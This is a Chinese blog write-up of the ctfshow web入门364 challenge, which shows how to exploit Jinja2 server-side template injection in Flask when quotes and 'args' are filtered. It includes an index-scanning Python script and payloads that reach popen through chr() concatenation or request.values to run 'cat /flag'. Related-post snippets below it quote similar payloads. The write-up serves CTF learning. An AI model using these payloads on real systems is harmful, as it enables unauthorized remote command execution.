SSTI模板注入-args、单双引号被过滤绕过(ctfshow web入门364)

最新推荐文章于 2024-05-11 19:10:17 发布
最新推荐文章于 2024-05-11 19:10:17 发布
阅读量237 收藏
点赞数 1
分类专栏: SSTI模板注入 CTFShow 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/129614039
版权

SSTI模板注入args、单双引号被过滤绕过

绕过技巧

当单双引号被过滤时,我们使用()或者[]来获得我们所需要的类,并且我们是尝试使用传参的方式将我们的shell命令传进去执行,但是当args也被过滤的时候,我们就不能使用request.args.参数名 来进行传参了。

我这里的绕过方法有两种,一种是我们获得chr()这个python的内置函数,chr(ascii值)函数接收一个字符的ascii码值然后将该ascii码值所对应的字符返回,这时我们就可以使用chr(ascii值)得到我们想要的字符,然后将其进行拼接成我们想要的字符串或者shell命令。另一种方法是,既然args不能用,flask框架(python)获取参数的方法又不是只有request.args,此外flask框架获取参数的方法还有request.values.参数名,其中request.values既可接收get传参也可接收post传参。

实例引入-ctfshow web入门364

1、判断是否存在SSTI模板注入漏洞

首先输入参数值name={{7*7}}观察页面是否输出49?
在这里插入图片描述
页面输出49,说明该站点存在SSTI模板注入漏洞。

2、获得内置类所对应的类

由于单双引号被过滤了,我们这里使用[]来获取内置类所对应的类。

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__}}

在这里插入图片描述

3、获得object基类

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__.__base__}}

在这里插入图片描述

4、获得所有子类

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()}}

在这里插入图片描述

5、获得含有可以执行shell命令方法的类

我们还是以获得含有popen方法的类为例,使用以下脚本代码跑出该类的索引值:

import requests

num = 0
for num in range(500):
    try:
        url = "http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()["+str(num)+"].__init__.__globals__.popen}}"
        res = requests.get(url=url).text
        if 'popen' in res:
            print(num)
        num += 1
    except:
        num += 1

在这里插入图片描述
获得该类的索引值132。

6、获得可以执行shell命令的方法

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__.popen}}

在这里插入图片描述

7、执行shell命令获取flag

使用chr()拼接shell命令

我们可以使用以下代码获取得到chr()函数。

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={%set char=config.__class__.__init__.__globals__.__builtins__.chr%}{%print char%}

在这里插入图片描述
得到chr()函数之后就可以拼接shell命令了。

http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={%set%20char=config.__class__.__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(char(99)%2bchar(97)%2bchar(116)%2bchar(32)%2bchar(47)%2bchar(102)%2bchar(108)%2bchar(97)%2bchar(103)).read()}}

在这里插入图片描述
成功拿到flag。
其中,99 97 116 32 47 102 108 97 103 为"cat /flag"字符串每个字符的ascii码值。

使用request.values进行传参
http://02c95de6-580d-4a71-b794-619eaeb1768a.challenge.ctf.show/?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(request.values.a).read()}}&a=cat /flag

在这里插入图片描述

你们de4月天
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSTI模板注入-中括号、args双引号过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1654
SSTI模板注入漏洞——中括号、双引号args过滤。 ctfshow web入门365
ctfshow-ssti
weixin_74660472的博客
04-18 338
ssti漏洞原理ssti服务端模板注入ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
2024年网络安全最全ctfshow web入门 SSTI(1),2024年最新网络安全开发者跳槽指南
最新发布
2401_84264662的博客
05-11 589
得到str的类对象。2.这会得到str类的基类列表,其中第一个元素是object类。3.object返回一个包含Python中所有类的列表,这些类都是直接或间接从object继承的。4.选择了列表中的第133个元素(因为索引是从0开始的)。5.Popen通过访问Popen类的__init__方法的属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。6.popen从全局变量字典中获取名为popen的变量7.使用Popen类来执行cat /flag。
CTFSHOW-SSTI
Monica的博客
11-12 4826
参考文章 SSTI模板注入绕过(进阶篇)_羽的博客-CSDN博客_ssti绕过
ctfshow--SSTI
qq_51684648的博客
03-15 589
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
ctfshow SSTI
m0_74940843的博客
11-08 59
GET输入?说明注入点是?name获得内置类所对应的类获得object基类获得所有子类我们用python脚本观察是否含有’popen’列出根目录内容取得flag。
ctfshow-SSTI
2301_80125214的博客
03-15 826
由题目提示可知url参数名应该是name,尝试输入name=world发现world被输出输入name={{7*7}},输出49,说明存在SSTI注入获取内置类对应的类获取object基类获得所有子类获得可以执行shell命令的子类执行命令name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}读取flag?
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
1. **Detect**(检测):识别可能存在的模板注入漏洞,通过分析应用程序的输入和输出模式来发现不安全的用户输入处理。 2. **Identify**(识别):确定模板引擎类型和版本,这对于了解可能的exploit和潜在的漏洞至关...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
ctfshow web入门 SSTI
2301_79442654的博客
03-16 195
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
ctfshow---web入门---SSTI(361-368)
2301_80470992的博客
03-16 452
根据题目给的“名字就是考点”,所以构建playloadstrstrobjectobjectobject[132].__init____init__['popen']popenos.popen。
ctfshow web入门 ssti过滤引号+args
c1516175954的博客
09-21 102
在上一关的payload的基础上(即数组形式+args),将args替换为values。args引号被过滤
SSTI模板注入-双引号过滤绕过(ctfshow web入门363)
T1ngSh0w的博客
03-18 489
我们获取基类以及所有子类的时候,可以使用()或者[]来获取。当我们使用可以执行shell命令的方法时,必定要使用引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。
SSTI模板注入-中括号、args、下划线、双引号、os、request、花括号被过滤绕过(ctfshow web入门369)
T1ngSh0w的博客
03-30 1920
ctfshow web入门369 中括号、argsrequest、花括号、引号、中括号、os被过滤绕过 SSTI模板注入漏洞过滤绕过
攻防世界Web:Confusion1
Light_inthe_eyes的博客
10-17 194
打开页面,看见一张图片,点击Home、Login、Register都没用: 看看源代码,在Register.php中发现一点提示: 但没什么思路,去网上看了看WP,觉得这道题的提示就很扯,那张图片提示了是SSTI?!就因为图片是蛇吞象意味着python干掉php?!想了想,是我还不够头脑风暴,那就按着这个思路往下做吧,简测试一下: payload:{{''.__class__.__mro__[2].__subclasses__()}},发现不行,也许是过滤了某些字符吧: 但没有过滤request,re
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
"详解现代Web应用的服务器端模板注入RCE:2015年黑帽大会精要
Server-Side Template Injection (SSTI) is a critical vulnerability that is often overlooked and mistaken for Cross-Site Scripting (XSS). In 2015, James Kettle presented a detailed analysis on SSTI in ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值